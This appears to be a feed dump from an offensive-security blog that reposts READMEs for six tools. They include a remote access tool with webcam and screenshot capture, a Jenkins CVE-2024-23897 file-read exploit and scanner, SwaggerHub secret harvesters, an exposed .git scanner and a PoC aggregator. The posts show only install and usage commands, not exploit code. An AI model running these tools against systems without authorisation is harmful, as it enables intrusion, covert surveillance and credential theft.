tag:blogger.com,1999:blog-25880887028852948362024-03-13T02:45:50.331-07:00Offensive Sec BlogSecurity of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etcOffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.comBlogger883125tag:blogger.com,1999:blog-2588088702885294836.post-63273576705289059702024-03-13T02:45:00.000-07:002024-03-13T02:45:12.913-07:00BackDoorSim - An Educational Into Remote Administration Tools
<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCDyueyU26LM9aLQPbpoMyxMgwxtXzCl6HK6JmoKVrU27Y61F10oDEPbDOr4p5TW16bQZhXaZrEuXdUpLNkkCl1WceelIRXKLMOdmirxENlD_Z-P6zTwjZjBaex9O1A073GF3XNRajsht4LRva1xUw1NTphQ3xXDmkdKWEPVs-AozdAIjFUWKKtMApoAL4/s1905/BackDoorSim.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="955" data-original-width="1905" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCDyueyU26LM9aLQPbpoMyxMgwxtXzCl6HK6JmoKVrU27Y61F10oDEPbDOr4p5TW16bQZhXaZrEuXdUpLNkkCl1WceelIRXKLMOdmirxENlD_Z-P6zTwjZjBaex9O1A073GF3XNRajsht4LRva1xUw1NTphQ3xXDmkdKWEPVs-AozdAIjFUWKKtMApoAL4/w640-h320/BackDoorSim.png" width="640" /></a></div><br /><p></p><p><code>BackdoorSim</code> is a remote administration and monitoring tool designed for educational and testing purposes. It consists of two main components: <code>ControlServer</code> and <code>BackdoorClient</code>. The server controls the client, allowing for various operations like file transfer, system monitoring, and more.</p> <span><a name="more"></a></span><div><br /></div><span style="font-size: large;"><b><strong>Disclaimer</strong></b></span><br /> <p>This tool is intended for educational purposes only. Misuse of this software can violate privacy and security policies. The developers are not responsible for any misuse or damage caused by this software. Always ensure you have permission to use this tool in your intended environment.</p> <br /><span style="font-size: large;"><b><strong>Features</strong></b></span><br /> <ul> <li><strong>File Transfer</strong>: Upload and download files between server and client.</li> <li><strong>Screenshot Capture</strong>: Take screenshots from the client's system.</li> <li><strong>System Information Gathering</strong>: Retrieve detailed system and security software information.</li> <li><strong>Camera Access</strong>: Capture images from the client's webcam.</li> <li><strong>Notifications</strong>: Send and display notifications on the client system.</li> <li><strong>Help Menu</strong>: Easy access to command information and usage.</li> </ul> <br /><span style="font-size: large;"><b><strong>Installation</strong></b></span><br /> <p>To set up <code>BackdoorSim</code>, you will need to install it on both the server and client machines.</p> <ol> <li>Clone the repository:</li> </ol> <p><code>shell $ git clone https://github.com/HalilDeniz/BackDoorSim.git</code></p> <ol> <li>Navigate to the project directory:</li> </ol> <p><code>shell $ cd BackDoorSim</code></p> <ol> <li>Install the required dependencies:</li> </ol> <p><code>shell $ pip install -r requirements.txt</code></p> <br /><span style="font-size: large;"><b><strong>Usage</strong></b></span><br /> <p>After starting both the server and client, you can use the following commands in the server's command prompt:</p> <ul> <li><code>upload [file_path]</code>: Upload a file to the client.</li> <li><code>download [file_path]</code>: Download a file from the client.</li> <li><code>screenshot</code>: Capture a screenshot from the client.</li> <li><code>sysinfo</code>: Get system information from the client.</li> <li><code>securityinfo</code>: Get security software status from the client.</li> <li><code>camshot</code>: Capture an image from the client's webcam.</li> <li><code>notify [title] [message]</code>: Send a notification to the client.</li> <li><code>help</code>: Display the help menu.</li> </ul> <br /><span style="font-size: large;"><b><strong>Disclaimer</strong></b></span><br /> <p>BackDoorSim is developed for educational purposes only. The creators of BackDoorSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.</p> <br /><span style="font-size: large;"><b><strong>DepNot: RansomwareSim</strong></b></span><br /> <p>If you are interested in tools like BackdoorSim, be sure to check out my recently released <strong><a href="https://denizhalil.com/2023/12/30/ransomware-prevention-education/" rel="nofollow" target="_blank" title="RansomwareSim">RansomwareSim</a></strong> tool</p> <br /><span style="font-size: large;"><b><strong>BackdoorSim: An Educational into Remote Administration Tools</strong></b></span><br /> <p>If you want to read our article about <a href="https://denizhalil.com/2024/01/29/educational-remote-administration-tool-backdoorsim/" rel="nofollow" target="_blank" title="Backdoor">Backdoor</a></p> <br /><span style="font-size: large;"><b><strong>Contributing</strong></b></span><br /> <p>Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions. 1. Fork the repository. 2. Create a new branch for your feature or bug fix. 3. Make your changes and commit them. 4. Push your changes to your forked repository. 5. Open a pull request in the main repository.</p> <br /><span style="font-size: large;"><b><strong>Contact</strong></b></span><br /> <p>For any inquiries or further information, you can reach me through the following channels:</p> <ul> <li>LinkedIn : <a href="https://www.linkedin.com/in/halil-ibrahim-deniz/" rel="nofollow" target="_blank" title="Halil Ibrahim Deniz">Halil Ibrahim Deniz</a></li> <li>TryHackMe: <a href="https://tryhackme.com/p/halilovic" rel="nofollow" target="_blank" title="Halilovic">Halilovic</a></li> <li>Instagram: <a href="https://www.instagram.com/deniz.halil333/" rel="nofollow" target="_blank" title="deniz.halil333">deniz.halil333</a></li> <li>YouTube : <a href="https://www.youtube.com/c/HalilDeniz" rel="nofollow" target="_blank" title="Halil Deniz">Halil Deniz</a></li> </ul> <br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/HalilDeniz/BackDoorSim" rel="nofollow" target="_blank" title="Download BackDoorSim">Download BackDoorSim</a></span></b></div>
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-23223064184790759722024-03-13T02:42:00.000-07:002024-03-13T02:42:21.094-07:00CVE-2024-23897 - Jenkins <= 2.441 & <= LTS 2.426.2 PoC And Scanner<article><div class="post-body entry-content" id="post-body-565184846932230502" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi2ujWgI-O8XhSDEW0GKqe34k767hx6qkhb75LEchmxfueorSZJchGkvtr6i3N6sWi2UBcSUwXC5YJg6FMScmxBFv58uPGkI9kYXZqbm-1fjnmjP-9MQmRRsOuCooses0JgzkXaH2BhtC9OOSgnDiXnrhtOrC5UOyN2SGEJd5QyIkhGrc-rjS3Qi9WJPMI9"><img alt="" border="0" height="278" id="BLOGGER_PHOTO_ID_733792974369x8788354" src="https://blogger.googleusercontent.com/img/a/AVvXsEi2ujWgI-O8XhSDEW0GKqe34k767hx6qkhb75LEchmxfueorSZJchGkvtr6i3N6sWi2UBcSUwXC5YJg6FMScmxBFv58uPGkI9kYXZqbm-1fjnmjP-9MQmRRsOuCooses0JgzkXaH2BhtC9OOSgnDiXnrhtOrC5UOyN2SGEJd5QyIkhGrc-rjS3Qi9WJPMI9=w640-h278" width="640" /></a></p><br /> <p>Exploitation and scanning tool specifically designed for Jenkins versions <code><= 2.441 & <= LTS 2.426.2</code>. It leverages <code>CVE-2024-23897</code> to assess and exploit vulnerabilities in Jenkins instances. </p> <span><a name="more"></a></span><p><br /></p><span style="font-size: large;"><b>Usage</b></span><br /> <p>Ensure you have the necessary permissions to scan and exploit the target systems. Use this tool responsibly and ethically.</p> <pre><code>python CVE-2024-23897.py -t <target> -p <port> -f <file><br /></code></pre> <p>or</p> <pre><code>python CVE-2024-23897.py -i <input_file> -f <file><br /></code></pre> <p><strong>Parameters:</strong> - <code>-t</code> or <code>--target</code>: Specify the target IP(s). Supports single IP, IP range, comma-separated list, or CIDR block. - <code>-i</code> or <code>--input-file</code>: Path to input file containing hosts in the format of <code>http://1.2.3.4:8080/</code> (one per line). - <code>-o</code> or <code>--output-file</code>: Export results to file (optional). - <code>-p</code> or <code>--port</code>: Specify the port number. Default is 8080 (optional). - <code>-f</code> or <code>--file</code>: Specify the file to read on the target system.</p> <br /><span style="font-size: large;"><b>Changelog</b></span><br /> <br /><b>[27th January 2024] - Feature Request</b><br /> <ul> <li>Added scanning/exploiting via input file with hosts (<code>-i INPUT_FILE</code>). </li> <li>Added export to file (<code>-o OUTPUT_FILE</code>).</li> </ul> <br /><b>[26th January 2024] - Initial Release</b><br /> <ul> <li>Initial release.</li> </ul> <br /><span style="font-size: large;"><b>Contributing</b></span><br /> <p>Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues.</p> <br /><span style="font-size: large;"><b>Author</b></span><br /> <p><strong>Alexander Hagenah</strong> - <a href="https://primepage.de" rel="nofollow" target="_blank" title="URL">URL</a> - <a href="https://twitter.com/xaitax" rel="nofollow" target="_blank" title="Twitter">Twitter</a></p> <br /><span style="font-size: large;"><b>Disclaimer</b></span><br /> <p>This tool is meant for educational and professional purposes only. Unauthorized scanning and exploiting of systems is illegal and unethical. Always ensure you have explicit permission to test and exploit any systems you target.</p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/xaitax/CVE-2024-23897" rel="nofollow" target="_blank" title="Download CVE-2024-23897">Download CVE-2024-23897</a></span></b></div></div></article>
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-1872601948677178972024-03-13T02:39:00.000-07:002024-03-13T02:39:55.908-07:00swaggerHole - A Python3 Script Searching For Secret On Swaggerhub<article><div class="post-body entry-content" id="post-body-7023330825648976169" itemprop="articleBody"><p align="center"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgRljQyFcgTZb4QTUQAXiP9eyW_Fekzx2kyra3RU1VavN4YnL6zw4rNwfeZnizpu6kduRsMj2JcgySp-UuMDoxok-6vBpNlpU4gea4gmMI7cdXGxPQ8EvKjXjpqX9Awz3WGQsAU5OctKJ7iJwfi0AczjKJ-h92AKkwZJrxcxU-1Wr3ui1-ITAGicwPyjc53"><img alt="" border="0" height="470" id="BLOGGER_PHOTO_ID_7338562964720588994" src="https://blogger.googleusercontent.com/img/a/AVvXsEgRljQyFcgTZb4QTUQAXiP9eyW_Fekzx2kyra3RU1VavN4YnL6zw4rNwfeZnizpu6kduRsMj2JcgySp-UuMDoxok-6vBpNlpU4gea4gmMI7cdXGxPQ8EvKjXjpqX9Awz3WGQsAU5OctKJ7iJwfi0AczjKJ-h92AKkwZJrxcxU-1Wr3ui1-ITAGicwPyjc53=w640-h470" width="640" /></a> </p><p align="center"><br /></p><h2 style="text-align: left;">Introduction </h2><div><div>This tool is made to automate the process of retrieving secrets in the public APIs on [swaggerHub](https://app.swaggerhub.com/search). This tool is multithreaded and pipe mode is available :) </div><span><a name="more"></a></span><div><br /></div><h2 style="text-align: left;">Requirements </h2><div> - python3 (sudo apt install python3) - pip3 (sudo apt install python3-pip) ## Installation <pre><code>pip3 install swaggerhole<br /></code></pre> or cloning this repository and running <pre><code>git clone https://github.com/Liodeus/swaggerHole.git<br />pip3 install .<br /></code></pre><div><br /></div><h2 style="text-align: left;"> Usage </h2><pre><code> _____ _ __ ____ _ ____ _ ____ _ ___ _____<br /> / ___/| | /| / // __ `// __ `// __ `// _ \ / ___/<br /> (__ ) | |/ |/ // /_/ // /_/ // /_/ // __// / <br />/____/ |__/|__/ \__,_/ \__, / \__, / \___//_/ <br /> __ __ __ /____/ /____/ <br /> / / / /____ / /___ <br /> / /_/ // __ \ / // _ \ <br /> / __ // /_/ // // __/ <br />/_/ /_/ \____//_/ \___/ <br /><br />usage: swaggerhole [-h] [-s SEARCH] [-o OUT] [-t THREADS] [-j] [-q] [-du] [-de]<br /><br />optional arguments:<br /> -h, --help show this help message and exit<br /> -s SEARCH, --search SEARCH<br /> Term to search<br /> -o OUT, --out OUT Output directory<br /> -t THREADS, --threads THREADS<br /> Threads number (Default 25)<br /> -j, --json Json ouput<br /> -q, --quiet Remove banner<br /> -du, --deactivate_url<br /> Deactivate the URL filtering<br /> -de, --deactivate_email<br /> Deactivate the email filtering<br /></code></pre><div><br /></div><h3 style="text-align: left;">Search for secret about a domain </h3><pre><code>swaggerHole -s test.com<br /><br />echo test.com | swaggerHole<br /></code></pre><h3 style="text-align: left;">Search for secret about a domain and output to json </h3><pre><code>swaggerHole -s test.com --json<br /><br />echo test.com | swaggerHole --json<br /></code></pre><h3 style="text-align: left;">Search for secret about a domain and do it fast :) </h3><pre><code>swaggerHole -s test.com -t 100<br /><br />echo test.com | swaggerHole -t 100<br /></code></pre><div><br /></div><h2 style="text-align: left;">Output explanation</h2></div><h3 style="text-align: left;">Normal output</h3><div> `Finding_Type - Finding - [Swagger_Name][Date_Last_Update][Line:Number]` </div><h3 style="text-align: left;">Json output</h3><div> `{"Finding_Type": Finding, "File": File_path, "Date": Date_Last_Update, "Line": Number}` </div><h3 style="text-align: left;">Deactivate url/email </h3><div>Using -du or -de remove the filtering done by the tool. There is more false positive with those options. </div><div><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Liodeus/swaggerHole" rel="nofollow" target="_blank" title="Download swaggerHole">Download swaggerHole</a></span></b></div></div></div></div></article>
<div style="clear: both;"></div>
<div class="post-footer">
</div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-58070731105916832682024-02-23T16:40:00.000-08:002024-02-23T16:40:01.369-08:00RepoReaper - An Automated Tool Crafted To Meticulously Scan And Identify Exposed .Git Repositories Within Specified Domains And Their Subdomains<article><div class="post-body entry-content" id="post-body-7991241996290697549" itemprop="articleBody"><p style="text-align: center;"><img alt="" border="0" height="322" id="BLOGGER_PHOTO_ID_7337938534126680226" src="https://blogger.googleusercontent.com/img/a/AVvXsEg_5C0WucZsbXT-PjR821HMxfyBed5n2_AH4xECr_7ybskQxryBjruetPisOrAxwdyihxXskVFaZP7SEZbXgipsiaqbysAyRwtTRCq6vQuK4IjA_cILQ4-olB17KIckzfGZ7neYf_ILbVYd5NVFxczPjh-kA94f7bzMfCUHV7CybCy80PeMyG69T8j9Llwj=w640-h322" width="640" /></p><p><br /></p> <p>RepoReaper is a precision tool designed to automate the identification of exposed <code>.git</code> repositories across a list of domains and subdomains. By processing a user-provided text file with domain names, RepoReaper systematically checks each for publicly accessible <code>.git</code> files. This enables rapid assessment and protection against information leaks, making RepoReaper an essential resource for security teams and web developers.</p><span style="font-size: large;"><b>Features</b></span><br /> <ul> <li>Automated scanning of domains and subdomains for exposed <code>.git</code> repositories.</li> <li>Streamlines the detection of sensitive data exposures.</li> <li>User-friendly command-line interface.</li> <li>Ideal for security audits and Bug Bounty.</li> </ul> <br /><span style="font-size: large;"><b>Installation</b></span><br /> <p>Clone the repository and install the required dependencies:</p> <pre><code>git clone https://github.com/YourUsername/RepoReaper.git<br />cd RepoReaper<br />pip install -r requirements.txt<br />chmod +x RepoReaper.py<br /></code></pre> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p>RepoReaper is executed from the command line and will prompt for the path to a file containing a list of domains or subdomains to be scanned.</p> <p>To start RepoReaper, simply run:</p> <pre><code>./RepoReaper.py<br /> or<br />python3 RepoReaper.py<br /></code></pre> <p>Upon execution, RepoReaper will ask for the path to the file containing the domains or subdomains: Enter the path of the file containing domains</p> <p>Provide the path to your text file when prompted. The file should contain one domain or subdomain per line, like so:</p> <pre><code>example.com<br />subdomain.example.com<br />anotherdomain.com<br /></code></pre> <p>RepoReaper will then proceed to scan the provided domains or subdomains for exposed .git repositories and report its findings. </p> <br /><span style="font-size: x-large;"><b>Disclaimer</b></span><br /> <p>This tool is intended for educational purposes and security research only. The user assumes all responsibility for any damages or misuse resulting from its use.</p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/chaudharyarjun/RepoReaper" rel="nofollow" target="_blank" title="Download RepoReaper">Download RepoReaper</a></span></b></div></div></article>
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-89203226825854494272024-02-23T16:32:00.000-08:002024-02-23T16:32:55.245-08:00SploitScan - A Sophisticated Cybersecurity Utility Designed To Provide Detailed Information On Vulnerabilities And Associated Proof-Of-Concept (PoC) Exploits<article><div class="post-body entry-content" id="post-body-2172782823988776098" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgT53TjuDpra62seqxecO1RspoOT58k-Ypky8RCZ8xjX775i76jCOkM15qD754BhHjRjr0rEvzcQ-f5GaEhwoycr1mnV2xMcucv-_wt_RiUb2I5ijl0V_0iFWVvFV4ZHYPveBfM1xWDfas7HqhF-bNutW8h02wcF2cHQh8Lgxnsv2O7E8BHR_aM86MqSuvv"><img alt="" border="0" height="398" id="BLOGGER_PHOTO_ID_7337928976700792594" src="https://blogger.googleusercontent.com/img/a/AVvXsEgT53TjuDpra62seqxecO1RspoOT58k-Ypky8RCZ8xjX775i76jCOkM15qD754BhHjRjr0rEvzcQ-f5GaEhwoycr1mnV2xMcucv-_wt_RiUb2I5ijl0V_0iFWVvFV4ZHYPveBfM1xWDfas7HqhF-bNutW8h02wcF2cHQh8Lgxnsv2O7E8BHR_aM86MqSuvv=w640-h398" width="640" /></a></p><br /> <p>SploitScan is a powerful and user-friendly tool designed to streamline the process of identifying exploits for known vulnerabilities and their respective exploitation probability. Empowering cybersecurity professionals with the capability to swiftly identify and apply known and test exploits. It's particularly valuable for professionals seeking to enhance their security measures or develop robust detection strategies against emerging threats.</p><span><a name="more"></a></span><p><br /></p><span style="font-size: large;"><b>Features</b></span><br /> <ul> <li><strong>CVE Information Retrieval</strong>: Fetches CVE details from the National Vulnerability Database.</li> <li><strong>EPSS Integration</strong>: Includes Exploit Prediction Scoring System (EPSS) data, offering a probability score for the likelihood of CVE exploitation, aiding in prioritization.</li> <li><strong>PoC Exploits Aggregation</strong>: Gathers publicly available PoC exploits, enhancing the understanding of vulnerabilities.</li> <li><strong>CISA KEV</strong>: Shows if the CVE has been listed in the Known Exploited Vulnerabilities (KEV) of CISA.</li> <li><strong>Patching Priority System</strong>: Evaluates and assigns a priority rating for patching based on various factors including public exploits availability.</li> <li><strong>Multi-CVE Support and Export Options</strong>: Supports multiple CVEs in a single run and allows exporting the results to JSON and CSV formats.</li> <li><strong>User-Friendly Interface</strong>: Easy to use, providing clear and concise information.</li> <li><strong>Comprehensive Security Tool</strong>: Ideal for quick security assessments and staying informed about recent vulnerabilities.</li> </ul> <br /><span style="font-size: large;"><b>Usage</b></span><p><strong>Regular</strong>:</p> <pre><code>python sploitscan.py CVE-YYYY-NNNNN<br /></code></pre> <p><strong>Enter one or more CVE IDs to fetch data. Separate multiple CVE IDs with spaces.</strong></p> <pre><code>python sploitscan.py CVE-YYYY-NNNNN CVE-YYYY-NNNNN<br /></code></pre> <p><strong>Optional: Export the results to a JSON or CSV file. Specify the format: 'json' or 'csv'.</strong></p> <pre><code>python sploitscan.py CVE-YYYY-NNNNN -e JSON<br /></code></pre> <br /><span style="font-size: large;"><b>Patching Prioritization System</b></span><br /> <p>The Patching Prioritization System in SploitScan provides a strategic approach to prioritizing security patches based on the severity and exploitability of vulnerabilities. It's influenced by the model from <a href="https://github.com/TURROKS/CVE_Prioritizer" rel="nofollow" target="_blank" title="CVE Prioritizer">CVE Prioritizer</a>, with enhancements for handling publicly available exploits. Here's how it works:</p> <ul> <li>A+ Priority: Assigned to CVEs listed in CISA's KEV or those with publicly available exploits. This reflects the highest risk and urgency for patching.</li> <li>A to D Priority: Based on a combination of CVSS scores and EPSS probability percentages. The decision matrix is as follows:</li> <li>A: CVSS score >= 6.0 and EPSS score >= 0.2. High severity with a significant probability of exploitation.</li> <li>B: CVSS score >= 6.0 but EPSS score < 0.2. High severity but lower probability of exploitation.</li> <li>C: CVSS score < 6.0 and EPSS score >= 0.2. Lower severity but higher probability of exploitation.</li> <li>D: CVSS score < 6.0 and EPSS score < 0.2. Lower severity and lower probability of exploitation.</li> </ul> <p>This system assists users in making informed decisions on which vulnerabilities to patch first, considering both their potential impact and the likelihood of exploitation. Thresholds can be changed to your business needs.</p> <br /><span style="font-size: large;"><b>Changelog</b></span><br /> <br /><b>[17th February 2024] - Enhancement Update</b><br /> <ul> <li><strong>Additional Information</strong>: Added further information such as references & vector string</li> <li><strong>Removed</strong>: Star count in publicly available exploits</li> </ul> <br /><b>[15th January 2024] - Enhancement Update</b><br /> <ul> <li><strong>Multiple CVE Support</strong>: Now capable of handling multiple CVE IDs in a single execution.</li> <li><strong>JSON and CSV Export</strong>: Added functionality to export results to JSON and CSV files.</li> <li><strong>Enhanced CVE Display</strong>: Improved visual differentiation and information layout for each CVE.</li> <li><strong>Patching Priority System</strong>: Introduced a priority rating system for patching, influenced by various factors including the availability of public exploits.</li> </ul> <br /><b>[13th January 2024] - Initial Release</b><br /> <ul> <li>Initial release of SploitScan.</li> </ul> <br /><span style="font-size: large;"><b>Contributing</b></span><br /> <p>Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues.</p> <br /><span style="font-size: large;"><b>Author</b></span><br /> <p><strong>Alexander Hagenah</strong> - <a href="https://primepage.de" rel="nofollow" target="_blank" title="URL">URL</a> - <a href="https://twitter.com/xaitax" rel="nofollow" target="_blank" title="Twitter">Twitter</a></p> <br /><span style="font-size: large;"><b>Credits</b></span><br /> <ul> <li><a href="https://nvd.nist.gov/developers/vulnerabilities" rel="nofollow" target="_blank" title="NIST NVD">NIST NVD</a></li> <li><a href="https://www.first.org/epss/api" rel="nofollow" target="_blank" title="FIRST EPSS">FIRST EPSS</a></li> <li><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" rel="nofollow" target="_blank" title="CISA Known Exploited Vulnerabilities Catalog">CISA Known Exploited Vulnerabilities Catalog</a></li> <li><a href="https://poc-in-github.motikan2010.net/" rel="nofollow" target="_blank" title="nomi-sec PoC-in-GitHub API">nomi-sec PoC-in-GitHub API</a></li> </ul><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/xaitax/SploitScan" rel="nofollow" target="_blank" title="Download SploitScan">Download SploitScan</a></span></b></div></div></article>
<div style="clear: both;"></div>
<div class="post-footer">
</div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-28433561421054772882024-02-20T16:36:00.000-08:002024-02-20T16:36:24.259-08:00SwaggerSpy - Automated OSINT On SwaggerHub<article><div class="post-body entry-content" id="post-body-3027054743303715784" itemprop="articleBody"><p align="center"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgCCIAE49ZM4rbvRN5fZ65zN82Q2PPQ79rLJxPpJMJaObT7Ug9CLu6Ld84C374UelSyoXL1PFcbpFiXRg2YBXZnHqueBjjwVyqzbLbPZL0CoWjpWZu5mgT2EYV4zAWDzav4Q0XNvfLO6b4F_6usZPxXMTQ_HiAvsJyZmYrCOZVL6j_lLJmGDLZSk1vQH9t4"><img alt="" border="0" height="364" id="BLOGGER_PHOTO_ID_7336842125363628178" src="https://blogger.googleusercontent.com/img/a/AVvXsEgCCIAE49ZM4rbvRN5fZ65zN82Q2PPQ79rLJxPpJMJaObT7Ug9CLu6Ld84C374UelSyoXL1PFcbpFiXRg2YBXZnHqueBjjwVyqzbLbPZL0CoWjpWZu5mgT2EYV4zAWDzav4Q0XNvfLO6b4F_6usZPxXMTQ_HiAvsJyZmYrCOZVL6j_lLJmGDLZSk1vQH9t4=w640-h364" width="640" /></a></p> <br /> <p>SwaggerSpy is a tool designed for automated Open Source Intelligence (OSINT) on SwaggerHub. This project aims to streamline the process of gathering intelligence from APIs documented on SwaggerHub, providing valuable insights for security researchers, developers, and IT professionals.</p> <span><a name="more"></a></span><p align="center"><br /></p><b>What is Swagger?</b><br /> <p>Swagger is an open-source framework that allows developers to design, build, document, and consume RESTful web services. It simplifies API development by providing a standard way to describe REST APIs using a JSON or YAML format. Swagger enables developers to create interactive documentation for their APIs, making it easier for both developers and non-developers to understand and use the API.</p> <br /><b>About SwaggerHub</b><br /> <p>SwaggerHub is a collaborative platform for designing, building, and managing APIs using the Swagger framework. It offers a centralized repository for API documentation, version control, and collaboration among team members. SwaggerHub simplifies the API development lifecycle by providing a unified platform for API design and testing.</p> <br /><b>Why OSINT on SwaggerHub?</b><br /> <p>Performing OSINT on SwaggerHub is crucial because developers, in their pursuit of efficient API documentation and sharing, may inadvertently expose sensitive information. Here are key reasons why OSINT on SwaggerHub is valuable:</p> <ol> <li> <p><strong>Developer Oversights:</strong> Developers might unintentionally include secrets, credentials, or sensitive information in API documentation on SwaggerHub. These oversights can lead to security vulnerabilities and unauthorized access if not identified and addressed promptly.</p> </li> <li> <p><strong>Security Best Practices:</strong> OSINT on SwaggerHub helps enforce security best practices. Identifying and rectifying potential security issues early in the development lifecycle is essential to ensure the confidentiality and integrity of APIs.</p> </li> <li> <p><strong>Preventing Data Leaks:</strong> By systematically scanning SwaggerHub for sensitive information, organizations can proactively prevent data leaks. This is especially crucial in today's interconnected digital landscape where APIs play a vital role in data exchange between services.</p> </li> <li> <p><strong>Risk Mitigation:</strong> Understanding that developers might forget to remove or obfuscate sensitive details in API documentation underscores the importance of continuous OSINT on SwaggerHub. This proactive approach mitigates the risk of unintentional exposure of critical information.</p> </li> <li> <p><strong>Compliance and Privacy:</strong> Many industries have stringent compliance requirements regarding the protection of sensitive data. OSINT on SwaggerHub ensures that APIs adhere to these regulations, promoting a culture of compliance and safeguarding user privacy.</p> </li> <li> <p><strong>Educational Opportunities:</strong> Identifying oversights in SwaggerHub documentation provides educational opportunities for developers. It encourages a security-conscious mindset, fostering a culture of awareness and responsible information handling.</p> </li> </ol> <p>By recognizing that developers can inadvertently expose secrets, OSINT on SwaggerHub becomes an integral part of the overall security strategy, safeguarding against potential threats and promoting a secure API ecosystem.</p> <br /><span style="font-size: large;"><b>How SwaggerSpy Works</b></span><br /> <p>SwaggerSpy obtains information from SwaggerHub and utilizes regular expressions to inspect API documentation for sensitive information, such as secrets and credentials.</p> <br /><span style="font-size: large;"><b>Getting Started</b></span><br /> <p>To use SwaggerSpy, follow these steps:</p> <ol> <li><strong>Installation:</strong> Clone the SwaggerSpy repository and install the required dependencies.</li> </ol> <pre><code>git clone https://github.com/UndeadSec/SwaggerSpy.git<br />cd SwaggerSpy<br />pip install -r requirements.txt<br /></code></pre> <ol> <li><strong>Usage:</strong> Run SwaggerSpy with the target search terms (more accurate with domains).</li> </ol> <pre><code>python swaggerspy.py searchterm<br /></code></pre> <ol> <li><strong>Results:</strong> SwaggerSpy will generate a report containing OSINT findings, including information about the API, endpoints, and secrets.</li> </ol> <br /><span style="font-size: large;"><b>Disclaimer</b></span><br /> <p>SwaggerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.</p> <br /><span style="font-size: large;"><b>Contribution</b></span><br /> <p>Contributions to SwaggerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.</p> <br /><span style="font-size: large;"><b>About the Author</b></span><br /> <p>SwaggerSpy is developed and maintained by <em>Alisson Moretto</em> (UndeadSec)</p> <p>I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.</p> <br /><span style="font-size: large;"><b>TODO</b></span><br /> <br /><b>Regular Expressions Enhancement</b><br /> <ul> <li>[ ] Review and improve existing regular expressions.</li> <li>[ ] Ensure that regular expressions adhere to best practices.</li> <li>[ ] Check for any potential optimizations in the regex patterns.</li> <li>[ ] Test regular expressions with various input scenarios for accuracy.</li> <li>[ ] Document any complex or non-trivial regex patterns for better understanding.</li> <li>[ ] Explore opportunities to modularize or break down complex patterns.</li> <li>[ ] Verify the regular expressions against the latest specifications or requirements.</li> <li>[ ] Update documentation to reflect any changes made to the regular expressions.</li> </ul> <br /><span style="font-size: large;"><b>License</b></span><br /> <p>SwaggerSpy is licensed under the MIT License. See the <a href="https://github.com/UndeadSec/LICENSE" rel="nofollow" target="_blank" title="LICENSE">LICENSE</a> file for details.</p> <br /><b>Thanks</b><br /> <p>Special thanks to <a href="https://github.com/Liodeus" rel="nofollow" target="_blank" title="@Liodeus">@Liodeus</a> for providing project inspiration through <a href="https://github.com/Liodeus/swaggerHole" rel="nofollow" target="_blank" title="swaggerHole">swaggerHole</a>.</p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/UndeadSec/SwaggerSpy" rel="nofollow" target="_blank" title="Download SwaggerSpy">Download SwaggerSpy</a></span></b></div></div></article>
<div style="clear: both;"></div>
